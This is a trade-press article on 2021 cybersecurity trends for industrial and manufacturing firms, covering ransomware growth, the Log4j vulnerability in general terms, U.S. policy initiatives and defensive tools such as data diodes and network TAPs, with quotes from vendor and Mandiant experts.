Widening threat landscape brings a multitude of challenges to industrial, manufacturing enterprises

The year 2021 has seen a wide range of cybersecurity incidents that have affected industrial and manufacturing enterprises. Adversaries have exploited these organizations using several techniques, including launching directly or indirectly ransomware and malware attacks, breaching hardware vulnerabilities, and targeting other security gaps. 

As we gathered from the first part of this series, ransomware offensives have risen to become the key threat to national security, with continuous attacks launched against businesses, including government, healthcare, and across the critical infrastructure sector. Supply chain cyberattacks are expected to quadruple in 2021 compared to last year, resulting in downtime of systems, monetary loss, and reputational damage. For industrial and manufacturing enterprises, the biggest cyber threat is a lack of knowledge and training. Often, management is not even fully aware of the risks, and most employees have little to no training regarding how to identify and avoid potential threats.

The increased impact and scale of ransomware operations from 2019 to 2021 has been largely fueled by the growth of the Ransomware-as-a-Service (RaaS) business model, by which developers sell or lease ransomware to other cybercriminals, the Canadian Centre for Cyber Security observed in recent data. 

Known ransom payments, after increasing rapidly from 2019 to 2020, appear to have stabilized around $200,000 in 2021, down slightly from 2020 levels, according to the Cyber Centre, Canada’s authority on cyber security. “At the same time, in 2021, the global average total cost of recovery from a ransomware incident (i.e., the cost of paying the ransom and/or remediating the compromised network) has more than doubled this year, increasing from $970,722 CAD in 2020 to $2.3M CAD in 2021,” it added.

Close to the end of the year, industrial and manufacturing enterprises find themselves coping with rising cyber risks caused by the Apache Log4j series of vulnerabilities. The exploitation of one of these vulnerabilities allows an unauthenticated attacker to remotely execute code on a server. Successful exploitation can occur even if the software accepting data input is not written in Java; such software can pass malicious strings to other (back end) systems that are written in Java. 

The Apache Software Foundation (ASF) has released on Friday another patch — version 2.17.0, as the initial log4j vulnerability, tracked as CVE-2021-44228, has been abused by all kinds of threat actors, ranging from state-backed hackers to ransomware gangs and others to inject Monero miners on vulnerable systems. 

In the second part of the series on the key cybersecurity trends that faced both industrial and manufacturing enterprises in 2021, Industrial Cyber dives into the effect of the various legislative and executive initiatives that the U.S. administration made during the year. We will also look into how the threat of ransomware changed qualitatively and quantitatively in 2021 for industrial and manufacturing enterprises, in addition to what were the focus security areas for industrial and manufacturing enterprises in 2021.

Addressing the numerous moves announced by the U.S. administration to deal with the rising threat landscape over the course of the year, Jason Drewniak, vice president for marketing and business development at Garland Technology said that the U.S. government has recognized the urgency in protecting critical infrastructures in ICS and OT environments. “The legislative and executive initiatives are jump-starting long-overdue conversations among various stakeholders leading to an effective blueprint to strengthen organizations’ readiness for ICS and OT cyber threats,” he told Industrial Cyber.

Many of the discussions the Garland Technology team is having with ICS and OT customers turn to the topic of President Joe Biden’s Executive Order on ‘Improving the Nation’s Cybersecurity’ (14028), according to Drewniak. “Everyone is closely watching what recommendations and requirements result from the President’s directive. As a trusted partner in the industry, we want to stay informed of these fast-moving developments,” he added.

While the legislative and executive initiatives announced by the US government concerning ICS and OT are a major step in the right direction, they are only a first step toward truly robust industrial cyber defense, Jeff Cornelius, EVP for cyber-physical security at Darktrace, told Industrial Cyber. “Most of these regulations have a heavy focus on vulnerability tracking and patching. But the reality is that a) most ICS/OT vulnerabilities have no practical mitigation advice and b) sophisticated ICS/OT attacks often exploit zero days (e.g., Log4J before its disclosure).” 

The reality of both unknown and un-patchable vulnerabilities—as well as unseen points IT/OT convergence—means that attackers can still slip into even the most rigorously patched environment, according to Cornelius. “And so, rather than merely focusing on patching the perimeter, organizations need to turn their attention to post-exploitation tactics, that is, identify even the most subtle forms of unusual behavior and neutralizing emerging attacks at their earliest stages,” he added.

Analyzing how these legislative and executive initiatives of the administration, helped ICS and OT environments to identify and improve their security gaps, Chris Sistrunk, technical manager at Mandiant ICS Consulting, told Industrial Cyber that, “these security gaps have been known for a long while, but largely never been addressed at scale until now. Because they either were not a victim or they weren’t forced to improve their ICS/OT security by government regulations.” 

“Critical Pipeline owners now have had to address these issues because of the two TSA Security Directives this year, and also Transportation/Rail as well as of a week or so ago,” Sistrunk added.

Assessing whether the threat of ransomware changed qualitatively and quantitatively in 2021 for industrial and manufacturing enterprises, Daniel Zafra, manager for intelligence analysis at Mandiant, told Industrial Cyber that ransomware threat actors have evolved their tactics and want to extort rich companies that are willing to pay, which have included companies that have ICS/OT systems to make or deliver their products. “Ransomware has changed both qualitatively and quantitatively,” he added.

“Qualitatively, through the last two years, we observed ransomware operators evolve from utilizing a ‘shotgun’ approach, which impacts multiple random victims, to a post-compromise approach,” according to Zafra. “This entails casting a wide net to then target organizations using a variety of techniques through the lifecycle. Lastly, ransomware operators increased the chances of receiving a ransom payment by extorting victims (i.e the operator threatens to post the victim’s data if they do not pay a ransom).”

“Quantitatively, the number of ransomware incidents we tracked based on data exposed from these extortion leaks increased from ~1.5K in 2020 to over 2.5K in 2021. The actual number of incidents is likely even higher than what we observed by tracking these numbers,” Zafra added.

The threat of ransomware to industrial and manufacturing has indeed changed quantitively, with attacks against these sectors rising along with the rise in ransomware more broadly, Cornelius said. “However, the Colonial Pipeline and JBS Foods ransomware events have foregrounded aspects of industrial security that have posed major risks for years, but largely went unattended to—namely, the threat that IT attacks pose to OT systems. And so, qualitatively, we are seeing more publicly known attacks ‘spill over’ from IT to OT (JBS Foods), and OT systems being manually shut down to avoid this spillover (Colonial Pipeline),” he added.

In ransomware strains like EKANS, “we see the attack directly targeting ICS processes in its kill chain. However, this is a minority of ransomware strains affecting industrial environments; the reality is that IT attacks are increasingly affecting OT, either directly or indirectly,” according to Cornelius. 

A focus on securing OT in a siloed capacity is thus insufficient to defend against cyber-attacks targeting industrial environments, especially fast-moving attacks like ransomware that can spread laterally very stealthily, Cornelius said. “What attacks like this show us is that we need unified protection of IT and OT—ideally by a technology that can understand the complexities of both environments, and also illuminate any points of convergence between the two,” he added.

Drewniak said that threats like ransomware are always evolving as bad actors try to find vulnerabilities to incapacitate critical infrastructures. “In project discussions with customers, we encounter questions about NIST and their proposed Cyber Security Framework Profile for Ransomware Management (NISTIR 8374). This framework provides an actionable roadmap to help organizations respond to and reduce their susceptibility to ransomware attacks,” he added.

Exploring the focus security areas for industrial and manufacturing enterprises in 2021, as OT systems become more complex with various devices, remote connections, and geographically distributed facilities, leading protection to become more complex, Drewniak said that while firewalls have long been the bedrock for segmenting OT networks, there is a use case for data diodes along with firewalls, as well as the Data Diode TAP variation. 

“Data diodes are also a security barrier system, but one that enforces a physical separation between network segments using one-way data transfer protocols, designed to eliminate back door attacks or breaches,” according to Drewniak. “Data diodes provide a physical and electrical separation layer, designed to pass one-way traffic between segments to eliminate attack risks.”

Data Diode TAPs typically send unidirectional ‘copies’ of the traffic to security monitoring tools, Drewniak added. “Data Diode TAPs are purpose-built ‘unintelligent’ hardware devices, whose circuitry physically doesn’t have the monitoring ports connected back to the network, rendering bidirectional traffic impossible and ensuring security tools or destinations are isolated from the network segment,” he said.

As industrial and manufacturing companies modernize their technological environments, they need to embrace sufficiently modern security strategies, according to Cornelius. “Yes—identifying assets, identifying vulnerabilities, and trying to patch them (when possible) all are important. But this is necessary, not sufficient,” he added. 

As industrial and manufacturing companies embrace remote connections, more advanced devices such as IIoT, and their environments become more complex broadly speaking, AI provides an ideal technology to understand these complexities and evolutions, Cornelius pointed out. “AI can process massive amounts of data, cutting through the noise to spot truly threatening behavior as it occurs in real-time. OT/ICS security focuses have been stuck in the past for decades. It is time to bring them up to date with the 21^st century,” he added.

“Every industrial company that is improving their security are doing it differently since their networks and ICS/OT systems are all engineered different (e.g. built-in different years, using different ICS vendors, different applications, etc). Many are focusing on raising security awareness and focusing on hardening the ingress/egress points into ICS/OT networks,” Zafra said. Based on Mandiant’s experience of responding to and researching ransomware operations, the ransomware family used by the actor normally does not determine the severity of the impact of one incident, he added. 

“Given that most ransomware intrusions are adapted to work within the target environment, the impacts depend on both the victim’s overall security and the actor’s choices during the attack,” according to Zafra. “For this reason, we suggest organizations focus on early prevention, hunting,  and detection of ransomware activity by acquiring and operationalizing up-to-date information on active threat clusters and their behaviors from sources such as threat intelligence publications, information sharing groups, and other open-source research,” he added.

Year-over-year, there was a 70 percent increase in manufacturing organizations appearing on ransomware data leak sites, Kimberly Goody, director of financial crime analysis at Mandiant, told Industrial Cyber. 

“Comparing H1 2021 to H2 2021, there was a 25% increase in the number of manufacturing organizations appearing on these sites. Overall, the threat of multi-faceted extortion attacks has increased to all organizations,” according to Goody. “Threat actors deploying ransomware have increasingly improved their capabilities and methodology allowing them to conduct a greater number of attacks and expand their impact at a single victim. The outsourcing of operational phases to other threat actors, such as gaining initial access to victims, has helped facilitate this as it allows them to specialize,” she added.

A recent Kaspersky report found signs of compromise in many organizations on computers directly related to ICS and said that the identified trends will not only continue but gain new traction in the coming year. Evaluating whether industrial and manufacturing enterprises are prepared for such intrusions, Drewniak said to adequately protect against such intrusions, organizations must deploy the right asset management, threat detection, and response tools. 

“Today, gaining full asset visibility for discovery and management begins with 100% packet visibility, afforded by network TAPs. Relying on switch SPAN ports is not going to cut it in today’s environment, as they were not designed for continuous monitoring,” he added. 

Alternately, a network TAP is a purpose-built hardware device that allows you to access and monitor your network traffic by copying packets without impacting or compromising network integrity, according to Drewniak. “The TAP allows network traffic to flow between its network ports without interruption, creating an exact copy of both sides of the traffic flow, continuously 24×7. The duplicate copies are then used for monitoring and security analysis, making network TAPs the foundation of a solid cyber security strategy,” he added.

Many industrial organizations are not ready for the new wave of attacks, nor are they often even aware of present vulnerabilities and active threats existing within their environments, according to Cornelius. “And so, broadly speaking, industrial and manufacturing organizations are not prepared.” 

The good news, however, is that sophisticated technologies are readily available to defend these organizations, Cornelius said. “With major OT/ICS security events this past year, it is no longer possible to ignore the threat. It is just a question of these organizations being willing to invest in the most robust security technologies on the market, rather than focus on achieving the lowest common denominator of industrial security,” he added.

Sistrunk said he “would agree that ransomware threat actors will continue to evolve tactics and tools. Largely, I would say the industrial and manufacturing orgs that have to meet government regulations like electric sector, nuclear, critical pipelines, critical chemicals will be more prepared than the ones that aren’t regulated or that don’t have any focus on an ICS Security Program,” he concluded.